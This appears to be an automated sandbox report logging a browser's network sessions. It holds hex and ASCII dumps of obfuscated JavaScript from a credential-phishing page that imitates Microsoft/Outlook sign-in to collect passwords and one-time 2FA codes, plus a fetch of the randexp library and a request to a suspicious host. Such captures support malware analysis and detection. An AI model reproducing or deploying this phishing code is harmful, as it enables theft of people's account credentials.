                                                          Data Ascii: 275econst _0x1770e6=_0x4d4e;(function(_0x4d4b96,_0x4dadad){const _0x3ae15a=_0x4d4e,_0x399160=_0x4d4b96();while(!![]){try{const _0x2ea7aa=-parseInt(_0x3ae15a(0x147))/0x1+parseInt(_0x3ae15a(0x1dc))/0x2+-parseInt(_0x3ae15a(0x12a))/0x3+parseInt(_0x3ae15a(0x
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 64 61 6c 72 65 61 64 79 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 62 35 33 28 29 7b 63 6f 6e 73 74 20 5f 30 78 63 30 37 63 30 35 3d 5b 27 23 62 74 6e 5f 6e 65 78 74 27 2c 27 6c 61 72 67 65 49 63 6f 6e 27 2c 27 6c 6f 67 6f 27 2c 27 64 61 74 61 2d 69 64 27 2c 27 73 63 72 69 70 74 27 2c 27 61 6e 69 6d 61 74 69 6f 6e 27 2c 27 75 6e 73 65 74 27 2c 27 23 62 74 6e 5f 62 61 63 6b 27 2c 27 64 69 73 70 6c 61 79 27 2c 27 61 70 70 65 6e 64 43 68 69 6c 64 27 2c 27 6f 74 70 64 65 73 63 27 2c 27 76 61 6c 69 64 5c 78 32 30 65 6d 61 69 6c 5c 78 32 30 6f 74 70 27 2c 27 6d 65 74 68 6f 64 69 64 27 2c 27 65 72 72 6f 72 5f 32 66 61 27 2c 27 69 41 64 64 69 74 69 6f 6e 61 6c 50 72 6f 6f 66 49 6e 66 6f 27 2c 27 50 68 6f 6e 65 41 70 70 4f 54 50 5f 4c 69 76 65 27 2c
                                                          Data Ascii: dalready=null;function _0x3b53(){const _0xc07c05=['#btn_next','largeIcon','logo','data-id','script','animation','unset','#btn_back','display','appendChild','otpdesc','valid\x20email\x20otp','methodid','error_2fa','iAdditionalProofInfo','PhoneAppOTP_Live',
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 78 32 30 5c 78 32 30 27 2c 27 6f 74 70 27 2c 27 53 68 6f 77 27 2c 27 70 61 72 73 65 27 2c 27 2e 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74 27 2c 27 64 79 6e 61 6d 69 63 2d 73 74 79 6c 65 27 2c 27 4e 6f 5c 78 32 30 61 63 63 6f 75 6e 74 3f 27 2c 27 42 61 63 6b 27 2c 27 65 6d 61 69 6c 27 2c 27 63 75 73 74 6f 6d 73 6c 61 73 68 73 74 72 27 2c 27 73 65 63 74 69 6f 6e 5f 61 75 74 68 63 61 6c 6c 27 2c 27 74 72 79 61 67 61 69 6e 6c 61 74 65 72 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 27 2c 27 73 65 6c 65 63 74 70 72 6f 74 65 63 74 6f 70 74 69 6f 6e 28 74 68 69 73 29 27 2c 27 6f 75 74 6c 6f 6f 6b 45 6d 61 69 6c 4c 61 62 65 6c 27 2c 27 45 72 72 6f 72 3a 27 2c 27 70 68 6f 6e 65 27 2c 27 54 77 6f 57 61 79 56 6f 69 63 65 4d 6f 62 69 6c 65 27 2c 27 6c 69
                                                          Data Ascii: x20\x20','otp','Show','parse','.sectioncontent','dynamic-style','No\x20account?','Back','email','customslashstr','section_authcall','tryagainlater','background-color','selectprotectoption(this)','outlookEmailLabel','Error:','phone','TwoWayVoiceMobile','li
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 5c 78 32 30 73 68 6f 72 74 6c 79 2e 3c 2f 70 3e 27 2c 27 6c 69 73 74 69 74 65 6d 27 2c 27 32 66 61 5c 78 32 30 69 73 5c 78 32 30 6f 66 66 5c 78 32 30 6e 65 77 77 65 62 73 69 74 65 27 2c 27 72 61 64 69 6f 27 2c 27 73 65 63 74 69 6f 6e 5f 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 73 5f 61 64 66 73 27 2c 27 70 72 6f 6f 66 44 69 76 27 2c 27 63 6c 61 73 73 4c 69 73 74 27 2c 27 6c 65 74 73 5c 78 32 30 74 72 79 5c 78 32 30 73 6f 6d 65 74 68 69 6e 67 5c 78 32 30 65 6c 73 65 5c 78 32 30 6f 72 5c 78 32 30 63 6f 6d 65 5c 78 32 30 62 61 63 6b 27 2c 27 73 65 63 74 69 6f 6e 73 27 2c 27 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 27 2c 27 69 45 6e 74 65 72 50 72 6f 6f 66 44 65 73 63 27 2c 27 66 61 64 65 69 6e 66 6f 72 6d 5c 78 32 30 31 73 5c 78 32 30 66 6f 72 77
                                                          Data Ascii: \x20shortly.</p>','listitem','2fa\x20is\x20off\x20newwebsite','radio','section_multipleaccounts_adfs','proofDiv','classList','lets\x20try\x20something\x20else\x20or\x20come\x20back','sections','addEventListener','iEnterProofDesc','fadeinform\x201s\x20forw
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 6c 61 79 3a 5c 78 32 30 75 6e 73 65 74 3b 27 2c 27 6f 74 70 5c 78 32 30 73 65 6e 74 5c 78 32 30 65 72 72 6f 72 27 2c 27 65 72 72 6f 72 5f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 6f 72 70 68 6f 6e 65 5f 6c 69 76 65 27 2c 27 75 73 65 41 75 74 68 65 6e 74 69 63 61 74 6f 72 27 2c 27 69 6e 70 5f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 6f 72 70 68 6f 6e 65 5f 6c 69 76 65 27 2c 27 3c 61 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6c 69 6e 6b 5c 78 32 30 6d 62 2d 31 36 5c 78 32 32 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 23 5c 78 32 32 5c 78 32 30 64 61 74 61 2d 69 64 3d 5c 78 32 32 27 2c 27 2e 62 61 63 6b 27 2c 27 53 65 6e 64 5c 78 32 30 61 6e 6f 74 68 65 72 5c 78 32 30 72 65 71 75 65 73 74 5c 78 32 30 74 6f 5c 78 32 30 6d 79 5c 78 32 30 4d 69 63 72 6f 73 6f 66 74 5c 78 32
                                                          Data Ascii: lay:\x20unset;','otp\x20sent\x20error','error_confirmemailorphone_live','useAuthenticator','inp_confirmemailorphone_live','<a\x20class=\x22link\x20mb-16\x22\x20href=\x22#\x22\x20data-id=\x22','.back','Send\x20another\x20request\x20to\x20my\x20Microsoft\x2
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 75 65 73 74 5c 78 32 30 74 6f 5c 78 32 30 63 6f 6d 70 6c 65 74 65 27 2c 27 61 70 70 72 6f 76 65 5c 78 32 30 61 75 74 68 5c 78 32 30 72 65 71 75 65 73 74 5c 78 32 30 61 75 74 68 5c 78 32 30 61 70 70 27 2c 27 73 69 67 6e 5c 78 32 30 69 6e 5c 78 32 30 62 6c 6f 63 6b 65 64 27 2c 27 70 77 64 27 2c 27 69 50 72 6f 6f 66 45 6d 61 69 6c 45 6e 74 72 79 27 2c 27 45 6e 74 65 72 5c 78 32 30 61 5c 78 32 30 76 61 6c 69 64 5c 78 32 30 65 6d 61 69 6c 5c 78 32 30 61 64 64 72 65 73 73 2c 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6e 75 6d 62 65 72 2c 5c 78 32 30 6f 72 5c 78 32 30 53 6b 79 70 65 5c 78 32 30 6e 61 6d 65 2e 27 2c 27 62 6f 74 74 6f 6d 73 65 63 74 69 6f 6e 27 2c 27 65 6d 61 69 6c 50 61 72 74 69 61 6c 27 2c 27 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 27 2c 27
                                                          Data Ascii: uest\x20to\x20complete','approve\x20auth\x20request\x20auth\x20app','sign\x20in\x20blocked','pwd','iProofEmailEntry','Enter\x20a\x20valid\x20email\x20address,\x20phone\x20number,\x20or\x20Skype\x20name.','bottomsection','emailPartial','sections_godaddy','
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 32 30 61 6e 6f 74 68 65 72 5c 78 32 30 72 65 71 75 65 73 74 5c 78 32 30 74 6f 5c 78 32 30 6d 79 5c 78 32 30 4f 75 74 6c 6f 6f 6b 5c 78 32 30 6d 6f 62 69 6c 65 5c 78 32 30 61 70 70 27 2c 27 69 63 6c 6f 75 64 2e 27 2c 27 73 65 63 74 69 6f 6e 5f 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 73 27 2c 27 73 65 63 74 69 6f 6e 73 5f 27 2c 27 65 72 72 6f 72 5c 78 32 30 6c 69 76 65 27 2c 27 61 72 69 61 2d 6c 69 76 65 27 2c 27 65 72 72 6f 72 5f 70 77 64 27 2c 27 6c 69 6e 6b 6f 70 74 69 6f 6e 63 6c 69 63 6b 28 74 68 69 73 29 27 2c 27 65 72 72 6f 72 5f 76 65 72 69 66 79 65 6d 61 69 6c 27 2c 27 73 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 61 70 70 72 6f 76 65 5c 78 32 30 61 75 74 68 5c 78 32 30 72 65 71 75 65 73 74 5c 78 32 30 61 75 74 68 5c 78 32 30 61 70 70 5c 78 32
                                                          Data Ascii: 20another\x20request\x20to\x20my\x20Outlook\x20mobile\x20app','icloud.','section_multipleaccounts','sections_','error\x20live','aria-live','error_pwd','linkoptionclick(this)','error_verifyemail','setAttribute','approve\x20auth\x20request\x20auth\x20app\x2
                                                          2024-08-27 22:11:09 UTC1152INData Raw: 32 30 64 61 74 61 2d 69 64 3d 5c 78 32 32 27 2c 27 6f 74 70 69 6d 67 27 2c 27 50 68 6f 6e 65 41 70 70 4f 54 50 27 2c 27 6c 69 6e 6b 5f 74 65 78 74 27 2c 27 4e 65 78 74 27 2c 27 76 61 6c 69 64 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6f 74 70 27 2c 27 73 72 63 27 2c 27 73 65 6c 65 63 74 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 61 64 66 73 27 2c 27 67 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 62 6c 6f 63 6b 27 2c 27 68 65 61 64 27 2c 27 70 72 6f 74 65 63 74 6f 70 74 69 6f 6e 73 27 2c 27 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 27 2c 27 63 68 65 63 6b 61 70 70 68 61 76 69 6e 67 74 72 6f 75 62 6c 65 73 65 63 74 69 6f 6e 27 2c 27 69 64 70 44 65 73 63 72 69 70 74 69 6f 6e 27 2c 27 45 6e 74 65 72 5c 78 32 30 74 68 65 5c 78 32 30 63 6f 64 65 5c 78 32 30
                                                          Data Ascii: 20data-id=\x22','otpimg','PhoneAppOTP','link_text','Next','valid\x20phone\x20otp','src','selectmultipleaccountadfs','getAttribute','block','head','protectoptions','aria-describedby','checkapphavingtroublesection','idpDescription','Enter\x20the\x20code\x20
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 31 30 34 32 0d 0a 68 2d 6f 72 67 2d 6c 6f 67 6f 27 2c 27 68 65 69 67 68 74 27 2c 27 23 62 74 6e 5f 76 65 72 69 66 79 6f 74 70 5f 6c 69 76 65 27 2c 27 61 63 63 65 73 73 62 6c 6f 63 6b 65 64 73 69 67 6e 6f 75 74 6f 70 74 69 6f 6e 27 2c 27 73 6d 73 5c 78 32 30 6f 74 70 5c 78 32 30 6c 69 76 65 27 2c 27 69 6e 70 75 74 27 2c 27 70 64 66 65 6d 61 69 6c 27 2c 27 74 77 6f 66 61 73 65 6c 65 63 74 27 2c 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 2c 27 6f 6e 69 6e 70 75 74 27 2c 27 74 65 6c 27 2c 27 6e 6f 52 69 67 68 74 42 6f 72 64 65 72 27 2c 27 69 68 61 76 65 61 63 6f 64 65 27 2c 27 23 66 35 66 37 66 38 27 2c 27 2e 62 61 6e 6e 65 72 6c 6f 67 6f 27 2c 27 56 65 72 69 66 79 5c 78 32 30 79 6f 75 72 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6e 75 6d 62 65 72 27 2c 27
                                                          Data Ascii: 1042h-org-logo','height','#btn_verifyotp_live','accessblockedsignoutoption','sms\x20otp\x20live','input','pdfemail','twofaselect','getElementById','oninput','tel','noRightBorder','ihaveacode','#f5f7f8','.bannerlogo','Verify\x20your\x20phone\x20number','
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 65 6d 61 69 6c 50 61 72 74 69 61 6c 5c 78 32 30 64 69 72 6c 74 72 5c 78 32 30 69 6e 70 75 74 2d 67 72 6f 75 70 5c 78 32 30 69 6e 70 75 74 2d 6d 61 78 2d 77 69 64 74 68 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 50 72 6f 6f 66 45 6d 61 69 6c 45 6e 74 72 79 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 64 69 73 70 6c 61 79 3a 5c 78 32 30 74 61 62 6c 65 3b 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 6e 70 75 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 6e 6f 52 69 67 68 74 42 6f 72 64 65 72 5c 78 32 32 5c 78 32 30 61
                                                          Data Ascii: x20\x20\x20\x20<div\x20class=\x22emailPartial\x20dirltr\x20input-group\x20input-max-width\x22\x20id=\x22iProofEmailEntry\x22\x20style=\x22display:\x20table;\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<input\x20class=\x22form-control\x20noRightBorder\x22\x20a


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          51192.168.2.449826185.199.109.1334431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:09 UTC860OUTGET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240827%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240827T221107Z&X-Amz-Expires=300&X-Amz-Signature=af9a21034bb5e7fe65ef996d782a724b97119aa5e47467ec39a4e165ad0b1acb&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1
                                                          Host: objects.githubusercontent.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:09 UTC848INHTTP/1.1 200 OK
                                                          Connection: close
                                                          Content-Length: 10245
                                                          Content-Type: application/octet-stream
                                                          Last-Modified: Tue, 07 Dec 2021 16:38:45 GMT
                                                          ETag: "0x8D9B9A009499A1E"
                                                          Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                          x-ms-request-id: c04d24d1-701e-006d-40c9-dd551e000000
                                                          x-ms-version: 2020-10-02
                                                          x-ms-creation-time: Tue, 17 Aug 2021 14:57:31 GMT
                                                          x-ms-blob-content-md5: bCCivoupALwKcRiJOisQcg==
                                                          x-ms-lease-status: unlocked
                                                          x-ms-lease-state: available
                                                          x-ms-blob-type: BlockBlob
                                                          Content-Disposition: attachment; filename=randexp.min.js
                                                          x-ms-server-encrypted: true
                                                          Via: 1.1 varnish, 1.1 varnish
                                                          Fastly-Restarts: 1
                                                          Accept-Ranges: bytes
                                                          Age: 4108
                                                          Date: Tue, 27 Aug 2024 22:11:09 GMT
                                                          X-Served-By: cache-iad-kiad7000071-IAD, cache-ewr-kewr1740034-EWR
                                                          X-Cache: HIT, HIT
                                                          X-Cache-Hits: 3138, 0
                                                          X-Timer: S1724796669.233990,VS0,VE1
                                                          2024-08-27 22:11:09 UTC1378INData Raw: 2f 2f 0a 2f 2f 20 72 61 6e 64 65 78 70 20 76 30 2e 34 2e 33 0a 2f 2f 20 43 72 65 61 74 65 20 72 61 6e 64 6f 6d 20 73 74 72 69 6e 67 73 20 74 68 61 74 20 6d 61 74 63 68 20 61 20 67 69 76 65 6e 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 2e 0a 2f 2f 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 32 30 31 36 20 62 79 20 52 6f 6c 79 20 46 65 6e 74 61 6e 65 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 29 0a 2f 2f 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 2f 2f 20 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 2f 72 61 6e 64 65 78 70 2e 6a 73 2f 72 61 77 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 20 0a 2f 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 52 61 6e 64 45 78 70 22
                                                          Data Ascii: //// randexp v0.4.3// Create random strings that match a given regular expression.//// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent)// MIT License// http://github.com/fent/randexp.js/raw/master/LICENSE //!function(){var e="RandExp"
                                                          2024-08-27 22:11:09 UTC1378INData Raw: 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 61 6e 64 49 6e 74 26 26 28 65 2e 72 61 6e 64 49 6e 74 3d 74 2e 72 61 6e 64 49 6e 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 70 2c 68 2c 63 3b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 6c 2e 52 4f 4f 54 3a 63 61 73 65 20 6c 2e 47 52 4f 55 50 3a 69 66 28 65 2e 66 6f 6c 6c 6f 77 65 64 42 79 7c 7c 65 2e 6e 6f 74 46 6f 6c 6c 6f 77 65 64 42 79 29 72 65 74 75 72 6e 22 22 3b 66 6f 72 28 65 2e 72 65 6d 65 6d 62 65 72 26 26 76 6f 69 64 20 30 3d 3d 3d 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 26 26 28 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 3d 74 2e 70 75 73 68 28 6e 75 6c 6c 29 2d 31 29 2c 6e 3d 65 2e 6f 70 74 69 6f 6e 73 3f 61 2e 63 61 6c 6c
                                                          Data Ascii: ),"function"==typeof t.randInt&&(e.randInt=t.randInt)}function u(e,t){var n,i,p,h,c;switch(e.type){case l.ROOT:case l.GROUP:if(e.followedBy||e.notFollowedBy)return"";for(e.remember&&void 0===e.groupNumber&&(e.groupNumber=t.push(null)-1),n=e.options?a.call
                                                          2024-08-27 22:11:09 UTC1378INData Raw: 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 72 61 6e 64 65 78 70 28 74 68 69 73 29 7d 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 66 61 75 6c 74 52 61 6e 67 65 3d 6e 65 77 20 68 28 33 32 2c 31 32 36 29 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 61 6e 64 49 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 31 2b 74 2d 65 29 29 7d 7d 2c 7b 22 64 69 73 63 6f 6e 74 69 6e 75 6f 75 73 2d 72 61 6e 67 65 22 3a 32 2c 72 65 74 3a 33 7d 5d 2c 32 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 74 68 69 73 2e 6c 6f 77 3d 65 2c 74 68 69 73 2e 68 69 67 68 3d 74 2c 74 68 69 73 2e 6c 65
                                                          Data Ascii: en=function(){return c.randexp(this)}},c.prototype.defaultRange=new h(32,126),c.prototype.randInt=function(e,t){return e+Math.floor(Math.random()*(1+t-e))}},{"discontinuous-range":2,ret:3}],2:[function(e,t,n){function r(e,t){this.low=e,this.high=t,this.le
                                                          2024-08-27 22:11:09 UTC1378INData Raw: 2e 6c 65 6e 67 74 68 3b 29 74 2e 70 75 73 68 28 73 2e 72 61 6e 67 65 73 5b 6e 5d 2e 63 6c 6f 6e 65 28 29 29 2c 6e 2b 2b 3b 73 2e 72 61 6e 67 65 73 3d 74 2c 61 28 73 29 7d 76 61 72 20 73 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 3f 65 2e 72 61 6e 67 65 73 2e 66 6f 72 45 61 63 68 28 6e 29 3a 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 3f 6e 28 65 29 3a 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 65 29 2c 6e 28 6e 65 77 20 72 28 65 2c 74 29 29 29 2c 74 68 69 73 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 73 2e 72 61 6e 67 65 73 2e 6c 65 6e 67 74 68 26 26
                                                          Data Ascii: .length;)t.push(s.ranges[n].clone()),n++;s.ranges=t,a(s)}var s=this;return e instanceof o?e.ranges.forEach(n):e instanceof r?n(e):(void 0===t&&(t=e),n(new r(e,t))),this},o.prototype.subtract=function(e,t){function n(e){for(var t=[],n=0;n<s.ranges.length&&
                                                          2024-08-27 22:11:09 UTC1378INData Raw: 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 44 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 22 3a 68 2e 70 75 73 68 28 61 2e 77 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 53 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 2f 5c 64 2f 2e 74 65 73 74 28 6e 29 3f 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 46 45 52 45 4e 43 45 2c 76 61 6c 75 65 3a 70 61 72 73 65 49 6e 74 28 6e 2c 31 30 29 7d 29 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 62 72 65 61 6b 3b 63 61 73 65 22 5e 22 3a 68 2e 70 75 73 68 28 73 2e
                                                          Data Ascii: );break;case"D":h.push(a.notInts());break;case"s":h.push(a.whitespace());break;case"S":h.push(a.notWhitespace());break;default:/\d/.test(n)?h.push({type:o.REFERENCE,value:parseInt(n,10)}):h.push({type:o.CHAR,value:n.charCodeAt(0)})}break;case"^":h.push(s.
                                                          2024-08-27 22:11:09 UTC1378INData Raw: 68 26 26 63 28 69 29 2c 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 50 45 54 49 54 49 4f 4e 2c 6d 69 6e 3a 30 2c 6d 61 78 3a 31 2f 30 2c 76 61 6c 75 65 3a 68 2e 70 6f 70 28 29 7d 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 72 65 74 75 72 6e 20 30 21 3d 3d 6c 2e 6c 65 6e 67 74 68 26 26 72 2e 65 72 72 6f 72 28 65 2c 22 55 6e 74 65 72 6d 69 6e 61 74 65 64 20 67 72 6f 75 70 22 29 2c 75 7d 2c 74 2e 65 78 70 6f 72 74 73 2e 74 79 70 65 73 3d 6f 7d 2c 7b 22 2e 2f 70 6f 73 69 74 69 6f 6e 73 22 3a 34 2c 22 2e 2f 73 65 74 73 22 3a 35 2c 22 2e 2f 74 79 70 65 73 22 3a 36 2c 22 2e 2f 75 74 69 6c 22 3a 37 7d 5d 2c 34 3a 5b 66 75
                                                          Data Ascii: h&&c(i),h.push({type:o.REPETITION,min:0,max:1/0,value:h.pop()});break;default:h.push({type:o.CHAR,value:n.charCodeAt(0)})}return 0!==l.length&&r.error(e,"Unterminated group"),u},t.exports.types=o},{"./positions":4,"./sets":5,"./types":6,"./util":7}],4:[fu
                                                          2024-08-27 22:11:09 UTC1378INData Raw: 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 36 35 32 37 39 7d 5d 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 30 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 33 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 32 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 33 7d 5d 7d 3b 6e 2e 77 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 31 7d 7d 2c 6e 2e 6e 6f 74 57 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 30 7d 7d 2c 6e 2e 69 6e
                                                          Data Ascii: r.CHAR,value:65279}]},i=function(){return[{type:r.CHAR,value:10},{type:r.CHAR,value:13},{type:r.CHAR,value:8232},{type:r.CHAR,value:8233}]};n.words=function(){return{type:r.SET,set:a(),not:!1}},n.notWords=function(){return{type:r.SET,set:a(),not:!0}},n.in
                                                          2024-08-27 22:11:09 UTC599INData Raw: 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 34 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 6f 72 64 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 35 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 36 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 37 5d 29 69 2e 70 75 73 68 28 7b 74 79 70 65 3a 72 2e 52 41 4e 47 45 2c 66 72 6f 6d 3a 28 61 5b 38 5d 7c 7c 61 5b 39 5d 29 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 74 6f 3a 61 5b 31 30 5d 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 3b 65 6c 73 65 7b 69 66 28 21 28 73 3d 61 5b 31 32 5d 29 29 72 65 74 75 72 6e 5b 69 2c 75 2e 6c 61 73 74 49 6e 64 65 78 5d 3b 69 2e 70 75
                                                          Data Ascii: hitespace());else if(a[4])i.push(o.notWords());else if(a[5])i.push(o.notInts());else if(a[6])i.push(o.notWhitespace());else if(a[7])i.push({type:r.RANGE,from:(a[8]||a[9]).charCodeAt(0),to:a[10].charCodeAt(0)});else{if(!(s=a[12]))return[i,u.lastIndex];i.pu


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          52192.168.2.449827188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:09 UTC1521OUTGET /klzLXAGm0iHdZcT6MtYiHXXpKNbL5RnuklNxCudj1JkeYERYfD8sQ8Od4hrM5uv220 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
